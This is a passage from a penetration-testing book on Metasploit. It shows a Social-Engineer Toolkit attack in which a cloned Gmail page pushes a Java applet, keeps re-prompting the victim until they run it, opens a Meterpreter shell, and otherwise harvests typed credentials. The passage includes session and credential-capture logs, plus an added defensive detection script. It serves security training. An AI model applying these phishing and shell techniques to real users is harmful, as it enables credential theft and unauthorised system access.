Metasploit: The Penetration Tester's Guide by David Kennedy & Jim O'Gorman & Devon Kearns & Mati Aharoni

Author: David Kennedy & Jim O'Gorman & Devon Kearns & Mati Aharoni
Language: eng
Format: azw3, mobi, epub
Tags: COMPUTERS / Internet / Security
ISBN: 9781593274023
Publisher: No Starch Press
Published: 2011-07-15T00:00:00+00:00


Figure 10-6. Multi-attack security warning

We have a backup attack, however. The target clicks Run on the malicious Java applet, a Meterpreter shell begins, and the target is redirected back to the original Gmail page. The attack is successful.

Notice that when using the Java applet, we automatically migrate to a separate thread (process) that happens to be notepad.exe. Because of this, closing the browser won’t terminate our Meterpreter shell, and the attack will continue. Also, within the configuration file you can set the “Java Repeater” option, which will continue to prompt the target with the Java applet warning even if he clicks Cancel. This makes it more likely that the target will click the Run button.

The Meterpreter shell is presented to us once a successful exploit is performed, as shown below.

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
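From the defender's side, the session output above leaves two traces on the target: a notepad.exe created by java.exe, and that notepad.exe holding a connection to port 443. The following added example (not from the book; the event record layout and the process-name lists are assumptions) correlates the two signals over constructed telemetry.

```python
# Constructed sample telemetry (not from the book), shaped loosely like
# process-creation and network-connection records from an endpoint sensor.
# PIDs and addresses mirror the session output quoted on the page.
EVENTS = [
    {"type": "proc", "pid": 824, "ppid": 1500, "image": "java.exe"},
    {"type": "proc", "pid": 3044, "ppid": 824, "image": "notepad.exe"},
    {"type": "net", "pid": 3044, "dst": "172.16.32.129", "dport": 443},
    {"type": "proc", "pid": 4100, "ppid": 1200, "image": "explorer.exe"},
    {"type": "proc", "pid": 4200, "ppid": 4100, "image": "notepad.exe"},
]

JAVA_RUNTIMES = {"java.exe", "javaw.exe"}  # parents of interest (assumed list)
QUIET_HOSTS = {"notepad.exe"}              # programs that should not open sockets


def find_migration_hosts(events):
    """Return one finding per quiet host process that looks like a payload host."""
    procs, findings = {}, {}
    for ev in events:
        if ev["type"] == "proc":
            procs[ev["pid"]] = ev
            parent = procs.get(ev["ppid"], {}).get("image", "").lower()
            # Signal 1: a text editor created by a Java runtime.
            if ev["image"].lower() in QUIET_HOSTS and parent in JAVA_RUNTIMES:
                findings[ev["pid"]] = {"pid": ev["pid"], "image": ev["image"],
                                       "parent": parent, "remote": None}
        elif ev["type"] == "net":
            proc = procs.get(ev["pid"])
            # Signal 2: the same kind of process opening a network connection.
            if proc and proc["image"].lower() in QUIET_HOSTS:
                hit = findings.setdefault(ev["pid"], {
                    "pid": ev["pid"], "image": proc["image"],
                    "parent": None, "remote": None})
                hit["remote"] = f'{ev["dst"]}:{ev["dport"]}'
    for hit in findings.values():
        # Both signals together are far stronger than either alone.
        both = hit["parent"] and hit["remote"]
        hit["severity"] = "high" if both else "medium"
    return sorted(findings.values(), key=lambda h: h["pid"])


if __name__ == "__main__":
    for finding in find_migration_hosts(EVENTS):
        print(finding)
```

The notepad.exe started from explorer.exe with no network activity is not reported; only the java.exe child with the port 443 connection is.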

Now let’s say that this attack fails, and the target clicks Cancel (without the repeater option enabled). He would then be prompted to enter his username and password, allowing you to harvest the credentials on the website and still have a successful attack. While you wouldn’t have a Meterpreter shell, because the target didn’t click Run, you would still be able to intercept the credentials:

[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

As you’ve seen in the preceding examples, SET offers a number of powerful web-based attack vectors in its arsenal. It can be difficult to persuade a target to think that a cloned site is legitimate. Most knowledgeable users are generally cautious about unfamiliar sites and try to avoid potential security issues as they browse the Internet. SET tries to leverage this cautiousness and, by letting you mimic a known website, fool even some of the savviest technical folks.


